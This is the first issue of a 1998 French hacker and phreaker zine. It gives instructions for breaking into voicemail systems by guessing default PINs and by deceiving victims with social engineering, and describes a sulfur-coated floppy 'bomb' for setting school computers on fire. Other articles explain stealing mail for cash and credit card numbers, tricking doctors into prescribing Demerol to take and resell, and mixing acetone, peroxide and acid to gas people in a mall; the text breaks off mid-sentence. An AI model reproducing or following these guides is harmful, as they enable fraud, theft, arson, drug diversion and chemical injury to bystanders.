         -::-No slogan set
            _____ _____     _     ______  ______ __ ___      _________
           |:      __ _ \  \  \  /     / |        ____ |    /   ___   |
           |      \__ _\ \  \  \/ ;   /  |;      /_ _/ |   /   /   /; |
           |   ____ __ ___\  \    :  /   |:  _        /   |   /   / : | 
           |: |              /    , /    |, | \     : \   |  :\__/    |
           |; |          ___/ .    /     |. |  \    ;  \  |  ;       /
           |___\         \________/      |___\  \__ ____\ |_________/
            ____ _ ___ __     ___   ___          ______   __    _______
           |:  _ _      ;\   |   \ \   \        /     ;| |  |  /   .  /
           |  |   \_______\  |:  _\ \_ _\      / /|   :| | ;| /      /
          _|  |___   _____   |; |__  ____     / <_|   ,| |  |/    : /
         |_|,  ___| |;   .\  |   __\ \_:__\  /   _     | |        ;/
           |: |     |:  ` /  | :|____  ____  \  / |;   | |  |\     \
           |; |     |, |\ \  | ;     \ \   ;\ \/  |:   | |: | \    .\
           |___\    |__| \_| |________\ \____\    |____| |___\ \_____\
             -::>Month Topic: Rveillez-vous!!!!!!
                                                   Crdit: __2
1 Fvrier 98


    Mesdames et Messieurs, je vous presente le new zine pyrofreakmag.
Ca c'est un entre remarquable, mais j'ai hate de voir si je vais 
m'habituer avec ce nom de zine la. Bon assez plaisant maintenant.
Passons aux choses un peu plus serieuses.


                            INFORMATIONS


Premierement, Quel est le but de cette zine?:
                 Celle-ci a comme but de faire develloper l'under-
ground (surtout au Qubec mais aussi dans tout autres endroit ou ca parle
francais), et cela dans plusieurs domaines, soit: Le hacking, le phreaking,
et toutes autres choses juger pertinantes pour nos lecteurs. 

Deuxiement, a qui cet zine s'adresse t'elle?:
                  Pyrofreakmag s'adresse  tous les gens qui veulent 
apprendre, c clair et simple.


Troisiement, a quelle frquence va etre distribuer Pyrofrakmag?:
		   Pyrofreakmag va etre distribuer a une frequence d'environ
1 fois par mois, mais cela sans avoir vraiment une date precise.

Quatriement, Comment nous rejoindre?:
                   Voici les moyens de rejoindre Pyrofreakmag et ses membres.

Soit sur IRC, sur #phreak.fr ,via le serveur undernet.
Soit par e-mail:  

            pyrofreakmag@hotmail.com  | Pour tous les membres            
		neuro@warlordz.com        | Pour rejoindre Neuro
		lordendrix@hotmail.com    | Pour rejoindre Endrix
		psycopat@psycopat.com     | Pour rejoindre psycopat
		NuClEaR@nuc99.com         | Pour rejoindre Nuclear
            fuckyou@ass.hole          | Pour le service des plaintes

Et vener visiter notre site web: http://pyrophreak.cjb.net

Si vous voulez que votre article paraisse dans le #2, envoyer le a
pyrofreakmag@hotmail.com . Ou si vous avez des questions, envoyer les aussi
a pyrofreakmag@hotmail.com . SVP, pas de question style: Comment hacker ou
Comment phreaker?

Cinquiement:
            Les gens qui pensaient que ce zine allait juste s'Adresser au 
phreaker, vous avez eux tord. Meme si on reprend frphreak, on a dcider
de parler de underground en gnral, et non seulement du phreak.



Sixiement:
		   Pour une question d'estetique, j'ai decide de mettre aucun
accents dans cet zine (Un peu). Et pour une fois je vais essayer de me 
forcer pour ne pas faire de faute d'ortographe ou de frappe, mais bon
je suis pas prof de francais.


			       FIN DE L'INTRO

Devise du zine:
		  Quand qu'on produit un zine, et qu'on est rendu au 17 ieme
numero, et que la qualitee du zine se deteriore, a cause du manque de d'idee,
aussi bien arreter ca la, au lieu de se rabaisser. (Je vise personne en par-
ticulier dans ce court paragraphe-ci.) J'en connais un qui va arreter de lire
le zine ici. :))))

La joke du zine:
                <PsYkAoS> mange dla marde ptite couile
                          :)))))))))))))))))))))))))))
                <Eric27> Ta tu fini avec tes aneries

Nouvelle du zine:
                 Yahoo a acheter geocities pour 3.9 milliards de dollars. Les
actions on grimpees de 47$ a 102$.

		Vous devez lire ceci avant d'aller plus loin

Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer
a lire le texte qui va suivre: Ont n'est aucunement responsable 
des actes, et meme des penss qui pourraient etre produites par les lecteurs
de ce zine par rapport a nos articles . Nous tenons a mettre cela bien au 
clair. Si vous n'etes pas d'Accord avec cet affirmation, fermer ce texte, 
et effacer le de votre disque dur ou sur tout autres disques. Vous etes
le seul responsable de vos actes.


			      
____________________________________________________________________________

                           TABLE DES MATIERES

       TITRE DE L'ARTICLE                        NICK DE L'AUTEUR
 
INTRO                                                 
1:Quelques conseils sur les VMBs                       Neuro
2:DiskBomb                                             endrix
3:Numros intressant de tlphone Amricain           Neuro
4:Fini le trashing, allons y pour la poste!            Neuro
5:Le Dmrol                                           Neuro
6:Pourquoi les gens pleurent?                          Neuro
7:WebPage Hacking                                      endrix
8:Qui sont-ils ?				                   [G]r4FX
CONCLUSION                                            
____________________________________________________________________________

Quelques conseils sur les VMBs.        
Par Neuro

Pour lire l'Article qui va suivre, vaut mieux avoir une base sur les VMBs,
pour celle-ci je vous conseille d'Aller lire NPC #4, en passant je trouve ce
zine exellent. Dans l'Article qui va suivre, je vais vous montrer, et 
expliquer quelques techniques pour trouver et hacker une VMB plus facilement.

Petite dfinition de la VMB: C'est une boite vocale,  qui est situe sur
un rseau (Compagnie, commerce, autres).

Comment trouver une VMB local?

Rien de plus simple, je vous explique quelques techniques.

1- Regarder dans le botin tlphonique.
       
   Comment trouver une VMB dans le botin tlphonique?
       C'est simple, regarder dans les pages jaune dans la section des
       entreprises, 90% du temps, celle-ci possede un systeme de VMB. Ou
       regarder dans la section dentistes ou medecins. Si la clinique 
       possede juste un specialiste, c'est surement une boite vocale normal,
       mais si vous voyer une annonce dans cette section, qui donne les noms
       des spcialistes de cet etablissement, c'est qui a surement un reseau
       de VMB.
    
   Ya aussi un deuxieme moyen qui est un peu plus complexe, mais on obtient
   de meilleurs rsultats. Je vous explique le principe. Le numero de tele-
   phone de la banque de votre ville est 454-9823. Il ne vous reste plus
   qu'a essayer 5 chiffres plus bas et 5 chiffres plus haut, soit dans 
   l'exemple-ci qui serait de 454-9818  454-9828. Vous avez de bonne chance
   de trouver un rseau de VMB qui est associer a la banque. Ceux-ci sont
   intressant, car 80% du temps elle contienne un systeme de PBX. Pour ceux
   qui connaise pas ce que veux dire PBX, bien c'est un numero qui fais 
   transition entre votre numero, et le numero a appeler. Ce qui veux dire
   que si vous faite des long distance, c'est le PBX qui paye. Et si vous 
   appeler quelqu'un, c'est le numero du PBX qui affiche sur afficheur (bell)
   ou qui est retracer. C'est pourquoi, si vous hacker une VMB d'une banque,
   vous risquer de faire deux pieres d'un coup. En passant quand vous scanner
   , je vous conseille le *67, pour viter les callback.


   Ya deux avantages, et un dsavantage sur les VMBs local.
   Avantage #1: 70% du temps, une PBX les accompagnes
   Avantage #2: Vous pouvez mettre en application le Social Engenering parce
                que, 80% du temps. La personne a qui appartient la boite 
                vocale dit son nom au complet dans le message d'entrer. Ce
                qui vous reste a faire, c d'Aller dans le botin tlphonique
                chercher son nom, et essayer les pass possible avec son 
                numero de tel ou avec son adresse. Si ca fonctionne pas, il 
                ne vous reste qu'a appeler la personne en question, et vous
                faire passer pour un sondeur, et lui demander des questions,
                style ca date de naissance de lui, ca femme et ces enfants et
                tout autres renseignement que vous juger bon de demander qui
                ont rapport au password.

  Dsavantage #1: Pour rejoindre la boite vocale, ou pour que des gens la
		  rejoindre, il faut etre dans la meme zone (bell) que celle-
                  ci, sinon il y aura des frais de long distance.
                
           
Comment trouver une VMB international (1-800)?

       Le moyen le plus simple est en scannant. Pour scanner je vous conseil-
le programme toneloc, en passant vener pas me demander comment il fonctionne,
liser le help (J'Ai l'impression d'avoir dja vu cette phrase ailleur :)).
Je vais vous donner quelques sries de numeros a scanner, qui ont un bon
pourcentage de VMB.

1-800-247-XXXX
1-800-248-XXXX
1-800-251-XXXX
1-800-252-XXXX
1-800-253-XXXX
1-800-255-XXXX
1-800-257-XXXX
1-800-258-XXXX
1-800-523-XXXX
1-800-524-XXXX
1-800-525-XXXX
1-800-526-XXXX
1-800-527-XXXX
1-800-528-XXXX

Ici, le *67 est plus ou moins important, vu que dans plusieurs cas, c'est
des compagnies, et prennent pas le temps de vrifier le numero, et ca bien
sur si y'on la possibiliter. 

Quand hacker,scanner les VMBs?

C simple, apres 21h et avant 7h am, vous risquez moins de rejoindre une 
tlphoniste.

Pour les password!!

80% du temps, les password sont composer de 4 chiffres, c'est pourquoi voici
une liste de password par defaut:
0000
1111
2222
3333
4444
5555
6666
7777
8888
9999
1234
Si la boite vocale=318 le pass peut etre:
3180
0318
8130
Un autre type de password par dfaut est d'essayer de 1945 a 1980, parce que
ya beaucoup de monde qui mette leur anne de naissance.


Ou et quand composer le password?

             Cela dpend du system auquel vous avez affaire. Dans tout les
cas, vous dever attendre que la VMB dclenche avant de faire quelque chose.
Quand le message d'intro dmarre, appuyer sur ## ou ** ou *0 ou 81 ou #,
ou autre chose semblable a ca (*7,*1,*4). La il y a une demoiselle qui va
vous demander d'insrer le numero de la boite vocale ainsi que le password
et d'appuyer sur #. Ce qui veux dire que si la boite vocal est 318, et le 
pass est 1234, vous tappez 3181234#. Si vous avec le bon password, vous 
avez un acces total a la VMB. Vous pouvez changer le message d'intro, 
envoyer des messages, effacers des messages et etc... Si vous etes pas 
capable de trouver le pass, essayer un autre VMB, parce que y'En a tellement
, et beaucoup d'entre-elle on les password par defaut.

Conclusion

D'apres mon exprience, si vous avez un bon "cerveau", en moins de une heure
vous parviendriez a hacker une VMB. En passant, si vous hacker une sysAdmin,
(La box qui controle tout le rseau), vous pouvez creer a votre guise des
VMB ou en effacer (je vois pas l'utiliter), c'est la chose la plus interes-
sante dans un systeme de VMBs, le seul probleme, elle est plus dure a hacker,
parce qu'elle est souvent composer de 5 ou meme 6 chiffres pour le password.
Il y a beaucoup d'autres choses sur les VMBs, ca va surement aller dans le
#2.

Voici quelques VMBs que je vous donne, il ne vous reste plus qu'a les hacker.


1-800-468-4556    (Juste jour)  *2 pour quitter le system
                                 *3 et * 4 Pour choisir la Box
1-800-468-9012    
1-800-468-3124    
1-800-468-0755    
1-800-821-1092   *4 le pass #   24/24   3 essais
1-800-821-4763   *4 le pass #   24/24   3 essais
1-800-526-0080
1-800-654-0089
 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1                       
:                      Question a faire rflchir: 
|            Combien il y a de ip entre 1.1.1.1 et 255.255.255.255?
|                   Si vous le savez, envoyer nous un e-mail :)!
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __

===============================par endrix===============================
========================================================================
========================================================================
==               ____  _     _    ____                  _             ==
==              |  _ \(_)___| | _| __ )  ___  _ __ ___ | |__          ==
==              | | | | / __| |/ /  _ \ / _ \| '_ ` _ \| '_ \         ==
==              | |_| | \__ \   <| |_) | (_) | | | | | | |_) |        ==
==              |____/|_|___/_|\_\____/ \___/|_| |_| |_|_.__/         ==
==                                                                    ==
========================================================================
=Tu habites en outaouais et tu as les ditions prcdentes de 2600 ??? =
= hey bien entre en contacte avec moi svp ... Je les cherches ... :)   =
========================================================================
========================================================================



                            O===============O
                           <| c 0 n + 4 c t |>
                            O===============O 


 __________________________________________________________________
/ _____________________________________<-www.endrix.net->__________\
||Site Web : Http://endrix.cjb.net ||_______________________\
||Contact : lordendrix@hotmail.com ||______________________________|+| 
||mIRC : #pirate, #grc, #hack.fr, #phreak.fr, #outaouais, #n0past  |+|
\  /
  



                      O==========================O
                     <| 1 n + r 0 d u c + 1 0 n  |>
                      O==========================O 


 Faire une bombe avec une disquette qui marche pu !! WAW quel exploit !!!
Pour le monde qui me croit pas que ca marche, 1N Y0UR F4C3 !!! Je l'ai 
essay sur mon vieux testeur de trojans, virus.. mon vieu boy(486 - 44)
Ca marche trs bien, ya meme fallut que je charge mon floppy colisse...
Alors suivez tout a la lettre dans ce zine et vous allez pourvoir en faire
sur les ordinateurs de votre cole ... :))) mouhhahhahaah !!!!



Err418 ---> Je veux pas que CHG me rip ca la ... (heehe, in ya face !!!)



                         O==================O
                        <| D 1 5 k  B 0 m b |>
                         O==================O 



------------------------------
-Les outils qu'il vous faut :-]
------------------------------


- Une vieille disquette         (dans tes vieilles affaires)
- du vernie a ongle TRANSPARENT (demande a maman)
- Beaucoup d'allumettes         (dans les affaires a papa)
- Un ordi a ton cole           (pour le ...testing...)
- Un petit bocal                (va voir moman)



------------------------------
- H3r3 s+4rs+ 7h3 4c+10n ...:-]
------------------------------


1- Premirement, il faut ouvrir la disquette DOUCEMENT !!!! Il faut faire 
   attention que le plastique ne casse pas,  sinon ca va tre plus dur la
   refermer ...

2- Quant tu ouvres la disquette, tu vas voir 2 morceau de coton blanc pour
   empcher que le disque en tournant touche le plastique. Enleve-les ...

3- Prend n'importe quel outil pour faire ce qui suit sauf du papier sabler(duh!)
   
4- Il faut prendre le souffre qu'il y a sur les allumettes et le mettre dans 
   le petit bocal.

5- Avec le vernie a ongle, il faut mettre une petite-moyenne(huH?) couche sur
   le disque. 

6- Mettre du souffre sur le vernie a ongle(qui est sur le disque) et essayer de 
   le faire des 2 bords. C'est juste plus efficase mais c'est pas ncessaire. 

7- Remettre le plastique sur le disque et refermer la disquette. Le vernie va 
   agir d'agent collant pour coller les deux plastique de la disquette. 

8- Attendre que le vernie soie compltement sche ... Et aprs se trouv un ordi
   sible, mettre la disquette dedans, l'allumer et PARTIRRRRRR !!!!!

9- Quand l'ordi va booter, il va pens que c'est un boot disk(heehe) et il va lire
   dessus. QUand le disque va tourner, le souffre va brul et ansi va la vie ...


 

                          O=====================O
                         <| c 0 n c l u s 1 0 n |>
                          O=====================O 


hey bien ... J'espre pour vous que l'ordinateur ne brulera pas !!! =P 
C'est tout ce que j'ai a dire bordel...








 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:               Si vous avez besoin d'une meche pour un explosif
|                      penser a une Cigarette!!!!
|               Pour une plus longue durer il y a le Cigar!!!
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __
Numros intressant de tlphone Amricain. 
Par Neuro

Voici quelques numeros de telephone que j'ai dcouvert dans un zine 
anglophone, vous pouvez peut-etre trouver une Utilite a ceux-ci.


215-561-3199/SPRINT LONG DISTANCE
202-456-1414/WHITE HOUSE
011-441-930-4832/QUEEN ELIZABETH
916-445-2864/JERRY BROWN
800-424-9090/RONALD REAGAN'S PRESS
212-799-5017/ABC NEW YORK FEED LINE
800-882-1061/AT & T STOCK PRICES
212-986-1660/STOCK QUOTES
213-935-1111/WIERD EFFECTS!
512-472-4263/WIERD RECORDING
212-976-2727/P.D.A.
619-748-0002/FONE CO. TESTING LINES
900-410-6272/SPACE SHUTTLE COMM.
201-221-6397/AMERICAN TELEPHONE
215-466-6680/BELL OF PENNSYLVANIA
202-347-0999/CHESAPEAKE TELEPHONE
213-829-0111/GENERAL TELEPHONE
808-533-4426/HAWAIIAN TELEPHONE
312-368-8000/ILLINOIS BELL TELEPHONE
317-265-8611/INDIANA BELL
313-223-7233/MICHIGAN BELL
313-223-7223/NEVADA BELL
207-955-1111/NEW ENGLAND TELEPHONE
201-483-3800/NEW JERSEY BELL
212-395-2200/NEW YORK TELEPHONE
515-243-0890/NORTHWESTERN BELL
216-822-6980/OHIO BELL
206-345-2900/PACIFIC NORTHWEST BELL
213-621-4141/PACIFIC TELEPHONE
205-321-2222/SOUTH CENTRAL BELL
404-391-2490/SOUTHERN BELL
203-771-4920/SOUTHERN NEW ENGLAND
314-247-5511/SOUTHWESTERN BELL
414-678-3511/WISCONSIN TELEPHONE
800-327-6713/UNKNOWN ORIGIN
303-232-8555/HP3000
315-423-1313/DEC-10
313-577-0260/WAYNE STATE
512-474-5011/AUSTIN COMPUTERS
516-567-8013/LYRICS TIMESHARING
212-369-5114/RSTS/E
415-327-5220/NEC
713-795-1200/SHELL COMPUTERS
518-471-8111/CNA OF NY
800-327-6761/AUTONET
800-228-1111/VISA CREDIT CHECK
713-483-2700/NASUA
213-383-1115/COSMOS
408-280-1901/TRW
404-885-3460/SEARS CREDIT CHECK
414-289-9988/AARDVARK SOFTWARE
919-852-1482/ANDROMEDA INCORPORATED
213-985-2922/ARTSCI
714-627-9887/ASTAR INTERNATIONAL
415-964-8021/AUTOMATED SIMULATIONS
503-345-3043/AVANT GARDE CREATIONS
415-456-6424/BRODERBUND SOFTWARE
415-658-8141/BUDGE COMPANY
714-755-5392/CAVALIER COMPUTER
801-753-6990/COMPUTER DATA SYSTEMS
213-701-5161/DATASOFT INC.
213-366-7160/DATAMOST
716-442-8960/DYNACOMP
213-346-6783/EDU-WARE
800-631-0856/HAYDEN
919-983-1990/MED SYSTEMS SOFTWARE
312-433-7550/MICRO LAB
206-454-1315/MICROSOFT
301-659-7212/MUSE SOFTWARE
209-683-6858/ON-LINE SYSTEMS
203-661-8799/PROGRAM DESIGN (PDI)
213-344-6599/QUALITY SOFTWARE
303-925-9293/SENTIENT SOFTWARE
702-647-2673/SIERRA SOFTWARE
916-920-1939/SIRIUS SOFTWARE
215-393-2640/SIR-TECH
415-962-8911/SOFTWARE PUBLISHERS
415-964-1353/STRATEGIC SIMULATIONS
217-359-8482/SUBLOGIC COM.
206-226-3216/SYNERGISTIC SOFTWARE


1-800 Numero du Gouvernement USA:

800-321-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR1-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR.
800-325-4072:COMBAT & ARMS SERVICE.
800-325-4095:COMBAT SUPPORT BRANCH.
800-325-4890:ROPD USAR COMBAT ARMS.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.

Autres:
301-234-0100:BALTIMORE ELECTRIC.
202-456-1414:WHITE HOUSE.
202-545-6706:PENTAGON.
202-343-1100:EPA.
714-891-1267:DIAL-A-GEEK.
714-897-5511:TIMELY.
213-571-6523:SATANIC MESSAGES.
213-664-7664:DIAL-A-SONG.
405-843-7396:SYNTHACER MUSIC.
213-765-1000:LIST OF MANY NUMBERS.
512-472-4263:WIERD.
512-472-9941:INSERT 25.
203-771-3930:PIONEERS.
213-254-4914:DIAL-A-ATHIEST.
212-586-0897:DIRTY.
213-840-3971:HOROWIERD
203-771-3930:PIONEERS


213-937-3580:TELENET


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
|                 Saviez vous que si vous etes arreter pour
|           fraude informatique (600$), c'est une sentence 3 fois
|              suprieur a un vol de vhicule (automobile,etc.)? 
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __
Fini le trashing, allons y pour la poste!!!  

Vous avez besoin de numero de carte de crdit? Vous avez besoin d'information
sur quelqu'un? Vous avez besoin d'argent? Vous me croiriez pas si je vous
disais que j'Ai la solution pour vous.Et cela grace a la poste (mail).
Pourquoi aller faire du trashing (fouiller dans les vidanges) pour trouver
des infos, quand on a juste a suivre le facteur durant une journer.

Je vous explique mon aventure!!

    C'tais en un beau vendredi apres-midi. Je recois l'Appel de quelqu'un,
me disant ceci.

Drig
Drig
Drig
<Neuro> Hello
<Bobby> Slu
<Bobby> Hey mec, ca te tante tu de fter a soir?
<Neuro> Pourquoi pas!
<Bobby> il y a un mga party chez nous, d'la bieres des filles, pis la musik
<Bobby> Juste 10$ l'entrer, pis t'amene ton stuck si tu veux fumer.
<Neuro> Ouais, c intressant, mais...
<Neuro> Il y a un probleme, j'Ai pas une cent
<Bobby> Ah, j'te connais ben, tu va t'arranger, fais aller ton esprit de 
        fraudeur comme d'habitude
<Bobby> En tk je t'attend
<Neuro> k
<Bobby> bye
<Neuro> bye                    


Apres avoir eu ce tlphone, fallais que je trouve du cash. Je me suis mis a
penser. Durant que je pensais, J'entendis le facteur dposer les lettres dans
ma boite a malle. Je vais chercher mes lettres. Une lueur de bonheur se
fit paraitre dans mes yeux, une lettre de ma tante quelques jours avant Noel.
C'est quoi??? Une carte disant Joyeux Noel? De l'argent pour me fliciter
d'etre aussi gentil? J'ouvre la lettre, h oui, j'avais bien raison, une 
lettre accompagner d'un beau billet de 50$. Mon problme tais rsolu.
Tout d'un coup, une penser diabolique me vient en tete. Je me suis dit:
Si je recois du cash pour noel par la poste, je suis surement pas le seul
a qui sa arrive???. Et oui vous avez deviner, j'Ai suivi le facteur durant
une journer. Je vous explique comment procder.

Chez nous, le facteur passe a 13h. A cette heure la, 80% des gens sont au
travail. Mais vous, vous avez prit conger, parce que vous avez besoin de cash.
Le facteur distribu les lettres a toutes les maisons de votre rue.Il ne vous
reste plus qu'a le suivre de quelques maisons, et de rammaser tout ce qui
est intressant dans la boite a malle de la victime.

Soit:
Relever de carte de crdit.
Envellope normal
Petit colis.
Votre Revue prfrer de la semaine.
Et tout autres affaire que vous juger intressant.

Dans un relever de carte de crdit, vous avez le numero de la carte, nom de 
la personne a qui appartient la carte,le solde,les fonts disponible sur
celle-ci. Il ne vous reste plus qu'a trouver la date d'expiration. Pas bien
dure. Vous aller sur un site de cul. Et vous vous abonner en essayant les
date d'Expiration une a une. Vous avez juste 48 possibilits, vu qu'habitu-
ellement, la date d'expiration est 4 ans apres l'entrer en vigueur de la 
carte. Essayer de trouver tout autres informations intressantes, mais 
essayer de vous faire discret, en laissant quelques envelloppes dans la boite
a malle, pour pas que le propritaire de celle-ci s'en apercoive trop
rapidement.

Quel est le meilleur temps pour faire ce truc?

C'Est simple, c'est la semaine avant noel. Juste en faisant une vingtaine
de maison, vous risquer de vous faire un minimum de 120$ facilement. Ce qui
devient tres payant a l'heure, vu que vous pouvez faire cela en 30 min.

Voici d'Autre temps durant l'anne ou c'est assez payant.
-Durant la semaine avant Paque
-La semaine suivant la fin des cours (Primaire et secondaire).
-Si vous connaiser la date de fete de quelqu'un dans votre quartier
-St-Valentin
 
Si vous etes chanceux vous risquer meme de ramasser une vrai carte de crdit.
Dans ce cas la, vous avez qu'a aller magasiner, et la vider. Surtout qu'il
n'y a pas encore de signature au l'endo (Metter la votre), et que son 
propritaire ne sait pas qu'elle est en ce moment actif. Vous avez environ
3 jours pour la vider!!

Pour ceux qui sont plus bati, et qui aime travailler en quipe de 2 ou 3.
Je vous conseille de vous attaquer au boite rouge de Poste Canada, (Celle
pour l'extrieur de votre rgion, parce que le monde envois de l'argent en 
cadeau quand c'est trop loin de chez-eux). Je vous explique le principe.
Vous prparer votre coup pour un dimanche soir, parce que ca fais plus qu'une
journer que la poste n'est pas venu rammaser le courriers. Vous vous metez
deux personnes, pour essayer de virer cette boite a mail a l'envers (Qui a
un poid qui est assez considrable, d'apres mon exprience, qui est pres de
175 a 200 lbs). Et la troisieme personne fais basculer la porte pour que les
lettres sortent de la mail. Si vous faite cela le dimanche avant Noel, vous 
avez beaucoup de chance de vous faire minimum 70$ chaque (3). Mais si vous 
en faite 5 comme ca, vous venez de multiplier le montant par 5, ca commence
a devenir intressant.

Conclusion:

J'ai dja essayer de dfoncer une boite verte (Ca quivaut a toutes les 
boites rouge d'un quartier (environ 10), c'est tres tres tres rsistant, et
meme avec de l'acide a 90% ca ne peut marcher, car il a un espace entre la 
porte et la serrure. Dans le #2 je vais essayer d'etre plus prcis en mettant
des photos dans mes textes.
Dans la premiere parti de ce texte je parlais bien sur, des boite a malle qui
sont au maison (sans serrure), et non celle qui sont en un bloc pour un 
quartier complet,quoi que j'ai une bonne technique pour celle-ci,mais ca
va aller dans le #2.
 
 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
|                Saviez-vous que toutes zines sur underground
|           qui ont t distribuer au public en francais depuis 1993,
|     Correspond a l'quivalent d'un dictionaire en longueur de texte?
|                              Soit 2000 pages!!!
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __
Le dmrol
Par Neuro

Dja en lisant le titre de cet article, vous avez plusieurs questions en tete: 
Qu'est-ce que le dmrol? A quoi ca sert le dmrol? Comment en tirer profit?
J'ai rponse a vos questions dans les prochaines lignes.


Qu'est ce que le Dmrol et a quoi sert-il?

	Le dmrol est un mdicament tres puissant. Il sert a enlever la douleur.
On appele cette catgorie de Mdicament, des anti-douleur (vidamment). Dans
cette meme classe on retrouve la morphine et l'hroine (Celle-ci n'est plus
vraiment utiliser de nos jours contre la douleur, a cause de sa dpendance 
quel entraine). Le dmrol est utiliser comme anti-douleur juste avant la
morphine, ce qui veut dire que celui-ci est tres puissant, mais bien entendu
moins que la morphine.

Avantage du dmrol a la morphine:

-Cout moins lver
-Peut etre sous forme de pilule a avaler
-Les mdecins les prescrive plus facilement que la morphine, qui celle-ci 
 est quasi improcurable si vous n'etes pas hospitaliser.
-Dpendance moins lever

Comment en tirer profit?

Je vous explique le principe. Vous voulez tripper sans avoir de grosse 
dpense. Et vous voulez tripper assez fort. La solution, le dmrol.
Vous aller chez un mdecin "dbutant" (Qui en passant sont plus facile a 
berner). Vous lui dite que vous avez de tres puissante crampe, et que vous 
avez de la misere a marcher quand elles se produisent. La, dite lui que vous
avez dja eu ce probleme auparavant, et le medecin qui vous avais suivi vous
avait prescris du dmrol. La, il va vous examiner un peu, et dans sa tete,
il va penser vous prescrire du dmrol pour suivre son confrere. 
Le medecin va vous demander combien de fois par jour, vous avez ce genre de 
douleur. Dite y de 3 a 4 fois par jour. Si vous lui dite ca, vous avez de
forte chance d'avoir une prescription d'Environ 60 pilules de 50 mg de
dmrol.Le cout est d'environ 25$, mais si vous etes assurer, le cout rduit
considrablement, et peut etre meme gratuit.Serait-ce une facon de frauder
le gouvernement?? 

La, le fun commence.
La premiere fois que vous allez prendre ca, vous aller en avoir assez de 3
pilules de 50mg. Vous allez voir le buzz que ca fais, et vous en redemanderez,
c assurer. Le buzz dure environ 2h et cela de facon intense. Vous allez 
etre parti dans les nuages, c le cas de le dire.

Maintenant pour se faire du cash, il ne vous reste plus qu'a en vendre. Style, 
3$ pour une pilule.Ce qui donne un bon profit si vous calculer:
                             3X60-25=155$
155 beau dollars de profit, et vous allez avoir des adeptes. Je veux vous 
avertir que le dmrol entraine une dpendance. Apres 4 ou 5 exprience, 
il va vous falloir une plus grosse dose, soit 4 ou plus pilules. Et apres 
quelques temps, cela peu monter beaucoup plus haut. Moi personnellement, 
j'ai essayer 5 1/2 pilules, apres environ 2 sem d'utilisation, et j'avais
la meme effet quand j'en ai prit 3 pour la premieres fois, parce que on 
s'habitu tres vite a cette subtance.

Attention: Prener pas plus que 3 pilules de 50 mg, ds votre premier trip,
           parce que vous risqueriez de le regretter.
Attention: Le dmrol engage une dpendance tres importante.
Attention: Il cause de la sommenolance, facque conduisez pas.

Bon c'tais l'ide principal que je voulais passer a travers ce texte. Pour
conclure, je voudrais dire que le dmrol existe sous forme d'injection, soit
10$ pour 50 mg. Mais il vou faut une prescription, et elle est beaucoup plus
difficile a obtenir. Et je trip pas fort sur les aiguilles, tk. Bien entendu,
c'est beaucoup plus puissant, et ca la un effet tres rapide. Dans plusieurs
cas c'est le medecin lui meme qui l'injecte. 

               //en absence de dmrol je n'avais pas d'alcool//
                          Crdit: Jean Leloup
 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1

                  MODEM=MOdulateur-->DEModulateur   :))))
'.________  __ __ ___________ ____ ______________ ____ ___ ______ __ __
Pourquoi les gens pleurent?
Par Neuro

En un beau dimanche apres-midi, vous allez magasiner dans votre centre-
d'achat favoris. Tout--coup vous avez les larmes aux yeux, et vous n'etes
plus capable d'arreter de pleurer, et cela, pareil pour les gens qui
vous suivrent. Pourquoi? Deux possibiliter: Soit que tout le monde a une
bonne raison de pleurer, ou soit qu'un petit anarchiste a jouer un tour.
Dans l'article qui va suivre, je vais m'aborder sur la deuxieme possibiliter.

Matriaux ncessaire

500 ml d'acetone pur
         On trouve l'acetone  la Quincaillerie du coin, dans la section
         dilluant a peinture.

450 ml de Peroxyde 30%
	On trouve le peroxyde 30% dans quelques pharmacies ,dans la section
	teinture pour cheveux, ou dans un centre de coiffure. Bien important
	faut pas que le peroxyde soit en crme comme a quelques endroits qui 
	en vendent, mais bien un liquide transparant comme de eau.

40 ml d'acide muriatique 20%  (HCL)
	On retrouve l'acide muriatique  la quincaillerie du coin, dans la
	section piscine, ou dans un centre de la piscine.
	ATTEMTION: Ce produit est tres dangereux, ne le respirer pas et 
	essayer de pas entrer en contact avec celui-ci.

1 Sac de magasinage
1 bouteille 2L de liquer vide


Vous etes a l'entrer du centre d'achat, cacher dans les buissons, ou dans 
votre char (Je trouve la deuxieme possibiliter mieux que la premiere).
Vous mlanger c'est 3 produit ensemble dans une bouteille 2 litres de 
liqueur, et vous brasser moyennement le tout et cela sans mettre le bouchon.
Vous metter la bouteille dans un sac en plastique de magasinage, de facon
quel soit debout, vu qu'il n'y a pas de bouchon. Vous rentrer dans le centre
d'achat, et vous vider votre bouteille dans une poubelle. En moins de 5  10
minutes, tout le monde qui vont passer a 20 pieds de la poubelle vont se
mettre a pleurer comme des petits fous, et vous, durant ce temps vous aller
vous bidonner dans un coin. Quand une personne passe pres de la poubelle,
les yeux vont lui commencer a bruler, ensuite une larme va tomber, et ensui-
te plusieurs larmes. Pour la victime, cela dure environ 15 min. Mais si
quelqu'un s'assoit sur le banc a coter de la poubelle en question, putain
de merde y fou si il reste assis la plus que 2 minutes. 

Pourquoi pas mettre le bouchon? Deux raison, Ca va mieux pour la vider dans
la poubelle, et vous ne risquer pas que la bouteille vous explose dans les
main.


Cela est un truc que moi-meme j'Ai dcouvert en faisant du peroxyde
d'actone dans ma maison. Faite attention , si il y a des petits bbs
pres de la poubelle, cela va etre un peu moins drole pour vous, mais 
dite vous que le centre-d'achat est un exemple comme un autre. Vous
pouvez mettre le produit au dessus d'une Urinoire (toilette acoter au mur).
La personne aura meme pas le temps de finir de pisser, quel va etre en 
train de pleurer en ce demandant ce qui se passe.

Si vous avez un ennemi, vous aller chez-lui(dehors), et vous verser
le produit sur le rebord d'une fenetre ouverte. Essayer d'en choisir une
